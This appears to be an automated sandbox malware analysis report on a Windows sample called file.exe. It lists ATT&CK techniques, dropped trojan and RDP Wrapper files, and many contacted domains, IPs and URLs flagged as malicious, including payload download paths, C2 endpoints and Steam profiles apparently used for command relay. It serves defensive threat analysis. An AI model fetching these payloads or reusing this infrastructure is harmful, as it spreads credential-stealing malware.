Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	511 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\GIEBGIIJDG.exe	100%	Avira	HEUR/AGEN.1311769
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe	100%	Avira	HEUR/AGEN.1311769
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe	100%	Avira	HEUR/AGEN.1311769
C:\Users\userBGIJEGCGDG.exe	100%	Avira	HEUR/AGEN.1311769
C:\ProgramData\GIEBGIIJDG.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5d9ab0d4c7_rdp[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5d9ab0d4c7_rdp[1].exe	100%	Joe Sandbox ML
C:\Users\userBGIJEGCGDG.exe	100%	Joe Sandbox ML
C:\Program Files\RDP Wrapper\rdpwrap.dll	54%	ReversingLabs	Win64.PUA.RDPWrapper
C:\ProgramData\BKJJEBKKEH.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\userAFHDHCAAKE.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\66f5db9e54794_vfkagks[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\66f5db9e54794_vfkagks[1].exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	47%	ReversingLabs	Win32.PUA.RDPWrap
C:\Windows\System32\rfxvmt.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://www.entrust.net/rpa03	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
stogeneratmns.shop	100%	Avira URL Cloud	malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	Avira URL Cloud	safe
https://reinforcenh.shop/api	100%	Avira URL Cloud	malware
wallkedsleeoi.shop	100%	Avira URL Cloud	malware
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
http://46.8.231.109/c4754d4f680ead72.phpHTe	100%	Avira URL Cloud	malware
https://5.75.211.162/vcruntime140.dll	100%	Avira URL Cloud	malware
https://5.75.211.162BFIEG	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	100%	Avira URL Cloud	malware
https://ballotnwu.site/apik	0%	Avira URL Cloud	safe
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869=	0%	Avira URL Cloud	safe
http://cowod.AFHIJKECFBKJ	0%	Avira URL Cloud	safe
https://5.75.211.162HIJJK	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
http://46.8.231.109/1309cdeb8f4c8736/nss3.dlL	100%	Avira URL Cloud	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcn	0%	Avira URL Cloud	safe
http://cowod.hopto.org/Rj	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	Avira URL Cloud	safe
offensivedzvju.shop	100%	Avira URL Cloud	malware
fragnantbui.shop	100%	Avira URL Cloud	malware
https://5.75.211.162/DBAAF	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	100%	Avira URL Cloud	malware
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	Avira URL Cloud	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	Avira URL Cloud	safe
http://46.8.231.109UVWXYZ1234567890undary=----CGHCGIIDGDAKFIEBKFCFaultrelease	0%	Avira URL Cloud	safe
https://5.75.211.162/x	100%	Avira URL Cloud	malware
https://5.75.211.162rt/form-data;	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
https://offensivedzvju.shop/	100%	Avira URL Cloud	malware
https://reinforcenh.shop/apii	100%	Avira URL Cloud	malware
http://46.8.231.109/1309cdeb8f4c8736/nss3.dll8	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869/inventory/	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	0%	Avira URL Cloud	safe
http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869	100%	Avira URL Cloud	malware
https://wallkedsleeoi.shop/api1	100%	Avira URL Cloud	malware
https://stogeneratmns.shop/apiT	100%	Avira URL Cloud	malware
http://46.8.231.109/	100%	Avira URL Cloud	malware
http://147.45.44.104	100%	Avira URL Cloud	malware
https://5.75.211.162/softokn3.dll	100%	Avira URL Cloud	malware
http://46.8.231.109/c4754d4f680ead72.php32	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;	100%	Avira URL Cloud	malware
http://147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe0	100%	Avira URL Cloud	malware
https://5.75.211.162ta	0%	Avira URL Cloud	safe
https://steamcommunity.com/workshop/	0%	Avira URL Cloud	safe
https://ballotnwu.site:443/api$	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU	0%	Avira URL Cloud	safe
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	0%	Avira URL Cloud	safe
http://46.8.231.109/1309cdeb8f4c8736/vcruntime140.dllj	100%	Avira URL Cloud	malware
https://ballotnwu.site:443/apiprofiles/76561199724331900	0%	Avira URL Cloud	safe
https://reinforcenh.shop/e	100%	Avira URL Cloud	malware
https://stogeneratmns.shop/api	100%	Avira URL Cloud	malware
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll4	100%	Avira URL Cloud	malware
https://ghostreedmnu.shop/api	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	Avira URL Cloud	safe
http://hansgborn.eu	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	Avira URL Cloud	safe
https://5.75.211.1620.5938.132	0%	Avira URL Cloud	safe
https://5.75.211.162/	100%	Avira URL Cloud	malware
http://api.ipify.orgd	0%	Avira URL Cloud	safe
http://46.8.231.109/c4754d4f680ead72.php	100%	Avira URL Cloud	malware
http://cowod.hopto.orgBKJ	0%	Avira URL Cloud	safe
http://46.8.231.109/1309cdeb8f4c8736/mozglue.dll0	100%	Avira URL Cloud	malware
http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll	100%	Avira URL Cloud	malware
http://api.ipify.orgX	0%	Avira URL Cloud	safe
http://46.8.231.109/c4754d4f680ead72.phpnu	100%	Avira URL Cloud	malware
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	100%	Avira URL Cloud	malware
https://5.75.211.162/pet_	100%	Avira URL Cloud	malware
http://hansgborn.eud	0%	Avira URL Cloud	safe
http://cowod.hopto.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fragnantbui.shop	188.114.97.3	true	true	unknown
gutterydhowi.shop	104.21.4.136	true	true	unknown
cowod.hopto.org	45.132.206.251	true	true	unknown
offensivedzvju.shop	188.114.97.3	true	true	unknown
drawzhotdog.shop	104.21.58.182	true	true	unknown
ghostreedmnu.shop	188.114.96.3	true	true	unknown
ballotnwu.site	172.67.128.144	true	true	unknown
wallkedsleeoi.shop	172.67.194.216	true	true	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
hansgborn.eu	188.114.97.3	true	true	unknown
steamcommunity.com	104.102.49.254	true	true	unknown
stogeneratmns.shop	188.114.96.3	true	true	unknown
reinforcenh.shop	172.67.208.139	true	true	unknown
api.ipify.org	104.26.13.205	true	false	unknown
vozmeatillu.shop	188.114.96.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
stogeneratmns.shop	true	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/api	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
wallkedsleeoi.shop	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
fragnantbui.shop	true	Avira URL Cloud: malware	unknown
http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe	true	Avira URL Cloud: malware	unknown
offensivedzvju.shop	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/nss3.dll	true		unknown
https://5.75.211.162/softokn3.dll	true	Avira URL Cloud: malware	unknown
https://stogeneratmns.shop/api	true	Avira URL Cloud: malware	unknown
https://ghostreedmnu.shop/api	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/c4754d4f680ead72.php	true	Avira URL Cloud: malware	unknown
http://46.8.231.109/1309cdeb8f4c8736/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162BFIEG	RegAsm.exe, 0000003D.00000002.3280037967.000000000063A000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	userAFHDHCAAKE.exe, 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004C2000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004CE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004D4000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
http://46.8.231.109/c4754d4f680ead72.phpHTe	RegAsm.exe, 00000004.00000002.2536324223.000000000138D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	userAFHDHCAAKE.exe, 00000007.00000002.2211440894.0000000003945000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869=	RegAsm.exe, 0000003D.00000002.3283819592.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://ballotnwu.site/apik	RegAsm.exe, 0000003A.00000002.3007548763.000000000168D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://s.ytimg.com;	RegAsm.exe, 0000003D.00000002.3283819592.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	userBGIJEGCGDG.exe, 00000012.00000002.2482597726.0000000002B01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://5.75.211.162HIJJK	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	file.exe	false	URL Reputation: safe	unknown
http://cowod.AFHIJKECFBKJ	RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.8.231.109/1309cdeb8f4c8736/nss3.dlL	RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcn	RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org/Rj	RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/DBAAF	RegAsm.exe, 0000003D.00000002.3283819592.0000000001151000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000011.00000002.2351016346.000000000135E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2354635623.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.2356059269.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009323531.0000000001706000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	KJEHJKJEBGHJJKEBGIECAAFIJK.4.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	false	Avira URL Cloud: safe	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	RegAsm.exe, 00000004.00000002.2558214387.00000000278D1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.0000000001396000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2971689518.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, FCFBFB.10.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 0000000A.00000002.2971689518.0000000001230000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2967028725.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003A.00000002.3009063080.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3283819592.000000000116F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003D.00000002.3280037967.000000000052D000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.10.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe	false	URL Reputation: safe	unknown
